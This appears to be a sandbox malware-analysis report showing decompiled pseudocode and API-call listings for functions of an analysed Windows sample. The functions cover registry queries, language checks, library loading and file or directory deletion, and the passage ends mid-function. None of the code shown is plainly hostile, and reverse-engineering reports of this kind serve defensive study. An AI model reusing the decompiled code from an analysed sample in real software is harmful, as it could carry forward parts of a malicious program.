                                                                    0x005c7808
                                                                    0x005c780c
                                                                    0x005c780d
                                                                    0x005c7812
                                                                    0x005c7815
                                                                    0x005c781a
                                                                    0x005c781c
                                                                    0x005c7830
                                                                    0x005c7837
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c7855
                                                                    0x005c7866
                                                                    0x005c786d
                                                                    0x005c786f
                                                                    0x005c786f
                                                                    0x005c787d
                                                                    0x005c7881
                                                                    0x005c789e
                                                                    0x005c78a3
                                                                    0x005c78a8
                                                                    0x00000000
                                                                    0x005c78ae
                                                                    0x005c78ae
                                                                    0x005c78b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c78b5
                                                                    0x005c78b8
                                                                    0x005c78c2
                                                                    0x005c78c5
                                                                    0x005c78ca
                                                                    0x005c78ca
                                                                    0x005c78cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c78ce
                                                                    0x005c78d1
                                                                    0x005c78d7
                                                                    0x005c78c9
                                                                    0x005c78c9
                                                                    0x00000000
                                                                    0x005c78c9
                                                                    0x00000000
                                                                    0x005c78d7
                                                                    0x005c78d9
                                                                    0x005c78dd
                                                                    0x005c78df
                                                                    0x005c78e1
                                                                    0x005c78e3
                                                                    0x005c78e3
                                                                    0x005c78e3
                                                                    0x005c78e1
                                                                    0x005c78e9
                                                                    0x005c78ee
                                                                    0x005c78f2
                                                                    0x005c78f4
                                                                    0x005c78f6
                                                                    0x005c7900
                                                                    0x005c7900
                                                                    0x005c78f6
                                                                    0x005c790d
                                                                    0x00000000
                                                                    0x005c7912
                                                                    0x005c78bd
                                                                    0x005c78c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c78c0
                                                                    0x005c7857
                                                                    0x005c785a
                                                                    0x00000000
                                                                    0x005c785f
                                                                    0x005c7855
                                                                    0x005c7916
                                                                    0x005c7919
                                                                    0x005c791c
                                                                    0x005c7929

                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                                    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID:
                                                                    • API String ID: 3660427363-0
                                                                    • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                    • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                                    • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                                    • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E0040E8BC(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				E0040A2AC(_v12);
				_push(_t84);
				_push(0x40e9d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E0040A1C8(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040E9DA);
					return E0040A228( &_v28, 6);
				}
				E0040A5F0( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040E5E0(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L0040524C();
						E0040DF90(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040E70C(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x6d1c10;
							if( *0x6d1c10 == 0) {
								L00405254();
								E0040DF90(_t46, _t60,  &_v28, _t79, _t81);
								E0040E70C(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040E7F0(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040E70C(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E0040B698(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                    0x0040e8bc
                                                                    0x0040e8bc
                                                                    0x0040e8bf
                                                                    0x0040e8c1
                                                                    0x0040e8c3
                                                                    0x0040e8c5
                                                                    0x0040e8c7
                                                                    0x0040e8c9
                                                                    0x0040e8cb
                                                                    0x0040e8cc
                                                                    0x0040e8cd
                                                                    0x0040e8cf
                                                                    0x0040e8d2
                                                                    0x0040e8d8
                                                                    0x0040e8e0
                                                                    0x0040e8e7
                                                                    0x0040e8e8
                                                                    0x0040e8ed
                                                                    0x0040e8f0
                                                                    0x0040e8f5
                                                                    0x0040e8fe
                                                                    0x0040e9b8
                                                                    0x0040e9ba
                                                                    0x0040e9bd
                                                                    0x0040e9c0
                                                                    0x0040e9d2
                                                                    0x0040e9d2
                                                                    0x0040e90a
                                                                    0x0040e90f
                                                                    0x0040e914
                                                                    0x0040e919
                                                                    0x0040e919
                                                                    0x0040e91b
                                                                    0x0040e920
                                                                    0x0040e947
                                                                    0x0040e94d
                                                                    0x0040e956
                                                                    0x0040e967
                                                                    0x0040e96f
                                                                    0x0040e97c
                                                                    0x0040e981
                                                                    0x0040e984
                                                                    0x0040e986
                                                                    0x0040e98d
                                                                    0x0040e98f
                                                                    0x0040e997
                                                                    0x0040e9a4
                                                                    0x0040e9a4
                                                                    0x0040e98d
                                                                    0x0040e9a9
                                                                    0x0040e9ac
                                                                    0x0040e9b3
                                                                    0x0040e9b3
                                                                    0x0040e958
                                                                    0x0040e960
                                                                    0x0040e960
                                                                    0x00000000
                                                                    0x0040e956
                                                                    0x0040e922
                                                                    0x0040e942
                                                                    0x0040e943
                                                                    0x0040e945
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e945
                                                                    0x0040e931
                                                                    0x0040e93b
                                                                    0x00000000

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DefaultLanguage$SystemUser
                                                                    • String ID:
                                                                    • API String ID: 384301227-0
                                                                    • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                    • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                                    • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                    • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040E9E0(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40ea9a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E0040B2DC( &_v536, _t49);
				_push(_v536);
				E0040B318( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040E8BC(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E0040B278(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040EAA1);
				E0040A228( &_v540, 2);
				return E0040A1C8( &_v8);
			}











                                                                    0x0040e9ed
                                                                    0x0040e9f3
                                                                    0x0040e9f9
                                                                    0x0040e9fc
                                                                    0x0040ea00
                                                                    0x0040ea01
                                                                    0x0040ea06
                                                                    0x0040ea09
                                                                    0x0040ea1c
                                                                    0x0040ea29
                                                                    0x0040ea34
                                                                    0x0040ea46
                                                                    0x0040ea54
                                                                    0x0040ea55
                                                                    0x0040ea5e
                                                                    0x0040ea6d
                                                                    0x0040ea72
                                                                    0x0040ea76
                                                                    0x0040ea79
                                                                    0x0040ea7c
                                                                    0x0040ea8c
                                                                    0x0040ea99

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName
                                                                    • String ID:
                                                                    • API String ID: 1159719554-0
                                                                    • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                    • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                                    • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                    • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0060C158(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x60c1b5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E0040B278(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C1BC);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                    0x0060c159
                                                                    0x0060c15b
                                                                    0x0060c170
                                                                    0x0060c17b
                                                                    0x0060c17c
                                                                    0x0060c181
                                                                    0x0060c184
                                                                    0x0060c18f
                                                                    0x0060c194
                                                                    0x0060c19c
                                                                    0x0060c1a1
                                                                    0x0060c1a4
                                                                    0x0060c1a7
                                                                    0x0060c1b4
                                                                    0x0060c172
                                                                    0x0060c174
                                                                    0x0060c1cd
                                                                    0x0060c1cd

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                                    • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2018770650-0
                                                                    • Opcode ID: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
                                                                    • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                                    • Opcode Fuzzy Hash: 69ae15de9effa71a0ffa306cf77e1792f9f9152f3059beb619848b97606d8d59
                                                                    • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0060C664(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x60c6c1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = RemoveDirectoryW(E0040B278(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E0060C6C8);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                    0x0060c665
                                                                    0x0060c667
                                                                    0x0060c67c
                                                                    0x0060c687
                                                                    0x0060c688
                                                                    0x0060c68d
                                                                    0x0060c690
                                                                    0x0060c69b
                                                                    0x0060c6a0
                                                                    0x0060c6a8
                                                                    0x0060c6ad
                                                                    0x0060c6b0
                                                                    0x0060c6b3
                                                                    0x0060c6c0
                                                                    0x0060c67e
                                                                    0x0060c680
                                                                    0x0060c6d9
                                                                    0x0060c6d9

                                                                    APIs
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                                    • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryErrorLastRemove
                                                                    • String ID:
                                                                    • API String ID: 377330604-0
                                                                    • Opcode ID: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
                                                                    • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                                    • Opcode Fuzzy Hash: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
                                                                    • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E0042B848(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x42b8ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x42b89c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E0040B278(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0042B8A3);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                    0x0042b849
                                                                    0x0042b84b
                                                                    0x0042b84f
                                                                    0x0042b852
                                                                    0x0042b857
                                                                    0x0042b85c
                                                                    0x0042b85d
                                                                    0x0042b862
                                                                    0x0042b865
                                                                    0x0042b868
                                                                    0x0042b86d
                                                                    0x0042b86e
                                                                    0x0042b873
                                                                    0x0042b876
                                                                    0x0042b881
                                                                    0x0042b886
                                                                    0x0042b88b
                                                                    0x0042b88e
                                                                    0x0042b891
                                                                    0x0042b896
                                                                    0x0042b898
                                                                    0x0042b89b

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042B852
                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLibraryLoadMode
                                                                    • String ID:
                                                                    • API String ID: 2987862817-0
                                                                    • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                    • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                                    • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                    • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005B8250(void* __eax, void* __edx, void* __eflags) {
				void* _t9;
				void* _t17;
				void* _t22;
				void* _t23;

				_t23 = __eflags;
				_t22 = __edx;
				_t17 = __eax;
				_t9 = E0040B660( *((intOrPtr*)(__eax + 0xa4)), __edx);
				if(_t23 == 0) {
					return _t9;
				}
				if( *((char*)(_t17 + 0xc4)) != 0) {
					if( *((char*)(_t17 + 0xeb)) == 0) {
						SetWindowTextW( *(_t17 + 0x188), E0040B278(__edx));
					} else {
						SetWindowTextW( *(_t17 + 0x188), 0);
					}
				}
				_t6 = _t17 + 0xa4; // 0xa4
				return E0040A5A8(_t6, _t22);
			}







                                                                    0x005b8250
                                                                    0x005b8253
                                                                    0x005b8255
                                                                    0x005b825f
                                                                    0x005b8264
                                                                    0x005b82ac
                                                                    0x005b82ac
                                                                    0x005b826d
                                                                    0x005b8276
                                                                    0x005b8297
                                                                    0x005b8278
                                                                    0x005b8281
                                                                    0x005b8281
                                                                    0x005b8276
                                                                    0x005b829c
                                                                    0x00000000

                                                                    APIs
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: TextWindow
                                                                    • String ID:
                                                                    • API String ID: 530164218-0
                                                                    • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                    • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                                    • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                    • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 35%
                                                                    			E006AC477() {
				void* _t13;
				void* _t15;
				intOrPtr _t16;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t37;
				intOrPtr _t48;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t57;

				_t13 =  *0x6d68ac(0x6cd804, 0x8000, 0, _t56 - 4); // executed
				if(_t13 != 0) {
